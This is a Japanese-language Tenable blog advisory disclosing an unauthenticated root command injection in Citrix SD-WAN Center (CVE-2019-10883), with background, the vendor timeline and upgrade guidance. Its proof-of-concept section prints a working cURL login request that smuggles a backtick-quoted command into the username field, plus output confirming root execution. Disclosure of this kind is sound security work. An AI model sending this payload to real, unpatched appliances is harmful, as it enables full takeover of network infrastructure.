Tenable ブログ
ブログ通知を受信するCitrix SD-WAN CenterのOSに深刻なコマンドインジェクションの脆弱性が発見
Tenable ResearchはCitrix SD-WAN Centerにリモートでコードが実行される可能性がある重大な脆弱性を発見しました。
背景
4月10日、Citrixは 10.2.1より前のCitrix SD-WANセンター10.2.xおよび10.0.7より前のNetScaler SD-WANセンター10.0.xにおけるオペレーティングシステム(OS)コマンドインジェクションの脆弱性(CVE-2019-10883)についてのセキュリティ情報を公開しました。Tenable ResearchはCVE-2017-6316のプラグインを開発中にこの脆弱性を発見し、Citrixに報告しました。
Citrix Netscaler SD-WAN(ソフトウェア定義の広域ネットワーク)を使用すると、企業はネットワークを管理し、仮想WANを作成できます。これらの種類の製品は、支店やリモートデータセンターをサポートし、クラウドベースのアプリケーションの接続性を維持するために使用されます。CitrixのWebサイトによると、Netscaler SD-WANは海運、非営利、ホスピタリティなどの業界で使用されています。
分析
Tenable ResearchはCTX236992を調査している間、このセキュリティ情報に含まれた脆弱性のほとんどが認証を必要とすることを確認しました。私たちは、Nessusプラグインを作成する際、CTX236992の研究者が記事に記載した2つの認証されていないコマンドインジェクションの脆弱性を調べました。 これらの脆弱性は、Citrix SD-WANアプライアンスの脆弱性であるCVE-2017-6316に関連していると考えられます。
CVE-2017-6316の調査により、Citrix SD-WAN Center 10.2.0.136.733315が/home/talariuser/www/app/Controller/UsersController.php にあるコントローラーのユーザー指定データ($ username)の検証が不十分であることが脆弱性の原因であることが判明されました(CVE-2019-10883)。
概念実証
認証されていないリモートの攻撃者はこの脆弱点を悪用して、root権限で任意のコマンドを実行することができます。これは、次のcURLコマンドを実行することによって実現できます。
curl -skv --tlsv1.2 -d '_method=POST&data%5BUser%5D%5Busername%5D=%60sudo%20id%20>/tmp/test%60&data%5BUser%5D%5Bpassword%5D=my_password&data%5BUser%5D%5BsecPassword%5D=my_secPassword' 'https://[target_host]/login'
このコマンドを実行した結果の出力は次のとおりです。
root@VWC:/home/talariuser/www/app/Controller# cat /tmp/test
uid=0(root) gid=0(root) groups=0(root)
ベンダー応答
Tenable Researchは2月上旬にCitrixに報告し、2月末までに脆弱性が再現されたことを確認しました。Citrixは4月10日、この脆弱性に関するセキュリティ情報を公開しました。
ソリューション
ユーザーはCitrix SD-WAN Center 10.2.1以降およびNetScaler SD-WAN Center 10.0.7以降にアップグレードする必要があります。さらに、CitrixはSD-WANセンターのセキュリティを強化するために使用すべきベストプラクティスのリストを提供しました。
詳細情報
現代のアタックサーフェスを総合的に管理する Cyber Exposure Platform を初めて提供した Tenable について詳細情報をご覧ください。
今すぐ Tenable.io Vulnerability Management の60日間無料トライアルをお試しください。
関連記事
- Threat Intelligence
- Threat Management
- Vulnerability Management
- Vulnerability Scanning